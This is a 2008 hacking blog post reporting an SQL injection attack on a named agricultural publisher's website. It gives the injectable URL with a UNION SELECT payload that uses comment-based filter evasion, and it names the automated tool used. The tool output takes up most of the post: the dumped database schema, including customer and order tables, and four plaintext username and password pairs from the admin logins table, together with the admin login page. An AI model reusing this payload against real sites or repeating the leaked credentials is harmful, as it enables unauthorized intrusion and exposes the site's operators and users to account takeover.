viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, October 14, 2008

[SQLi] http://en.agrimedia.com/

12:57 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://en.agrimedia.com/admin/
Admin usr:login --> admin:agri8z3 (see else in dump)
Dump:
[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:26:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26

[Database]: usr_web4_1
[Table: Columns]
[0]config: var,value,log_time
[1]counter: counter_id,dom_lang,dom_lib,counted,add_time,log_time
[2]downloads: download_id,name,filesrc,filetype,alttext,cnt_dl,log_time
[3]images: image_id,name,picsrc,url,alttext,target,log_time
[4]interest: interest_id,dom_lang,dom_lib,poll,special,email,log_time
[5]interest_rules: rule_id,dom_lang,dom_lib,rule,log_time
[6]kontakte: kontakt_id,dom_lang,title,email,typ,log_time
[7]linkbanner: banner_id,dom_lang,dom_lib,name,picsrc,url,alttext,target,status,log_time
[8]links: link_id,name,url,alttext,target,log_time
[9]logins: login_id,name,user,pass,allow_items,allow_domains,status,log_time
[10]maillist: maillist_id,allow_langs,allow_libs,email,gender,firstname,lastname,format,info,valid,cnt_errors,last_error,demo_ok,add_time,log_time
[11]metatags: metatag_id,dom_lang,dom_lib,description,keywords,log_time
[12]newsitems: news_id,dom_lang,dom_lib,pub_date,headline,summary,content,full_lnk,rel_lnk_1,rel_lnk_2,rel_lnk_3,status,log_time
[13]newsletter: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,download_id,info,add_time,log_time,start_time,finish_time
[14]press_docs: presse_id,dom_lang,dom_lib,name,filesrc1,filesrc2,filesrc3,filetype1,filetype2,filetype3,info1,info2,info3,cnt_dl_1,cnt_dl_2,cnt_dl_3,status,add_time,log_time
[15]press_news: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,info,add_time,log_time,start_time,finish_time
[16]press_user: user_id,allow_langs,allow_libs,gender,firstname,lastname,journal,email,pwd,format,info,valid,cnt_logins,cnt_files,cnt_errors,last_error,demo_ok,log_time,add_time
[17]shop_art: art_id,dom_lang,dom_lib,item_pos,author,title,subtitle,summary,content,promotion,picthumb,piclarge,weight,price_euro,price_dollar,art_nr,isbn,biblio,published,visits,allow_cart,status,home,add_time,log_time
[18]shop_art_contents: content_id,art_id,item_pos,title,pic,log_time
[19]shop_art_examples: example_id,art_id,item_pos,title,pic,log_time
[20]shop_basket: basket_id,user_id,art_id,cnt,log_time
[21]shop_countries: country_id,country_de,country_en,short_eu,zone
[22]shop_invoice: euro_de,euro_europe,euro_world,dollar_de,dollar_europe,dollar_world,log_time
[23]shop_order_items: item_id,order_id,user_id,art_id,art_nr,title,author,isbn,weight,art_cnt,price_euro,price_dollar,add_time
[24]shop_orders: order_id,user_id,dom_lang,dom_lib,payment,currency,weight,total,vat_rate,pp_cost,remark,order_text,sik_oid,status,add_time,log_time
[25]shop_porto: porto_id,weight,porto_euro_de,porto_euro_europe,porto_euro_world,porto_dollar_de,porto_dollar_europe,porto_dollar_world,log_time
[26]shop_search: item_id,user_id,item,log_time
[27]shop_user: user_id,dom_lang,dom_lib,uid,pwd,anrede,firm,firstname,lastname,adrline1,adrline2,city,state,zip,country,tel,fax,l_anrede,l_firm,l_firstname,l_lastname,l_adrline1,l_adrline2,l_city,l_state,l_zip,l_country,l_tel,l_fax,paymode,euvatid,email,currency,logins,status,add_time,log_time
[28]texte: text_id,dom_lang,dom_lib,typ,content,log_time

[-] [20:40:31]
[-] Total URL Requests 313
[-] Done


[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:54:56
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26
[+] Dumping data from database "usr_web4_1" Table "logins"
[+] Column(s) ['user', 'pass']
[+] Number of Rows: 4

[0] admin:agri8z3:
[1] ulrike:casanostra:
[2] marcussefrin:lueneburg:
[3] doreen:wendland:

[-] [20:55:11]
[-] Total URL Requests 6
[-] Done

0 comments:

Post a Comment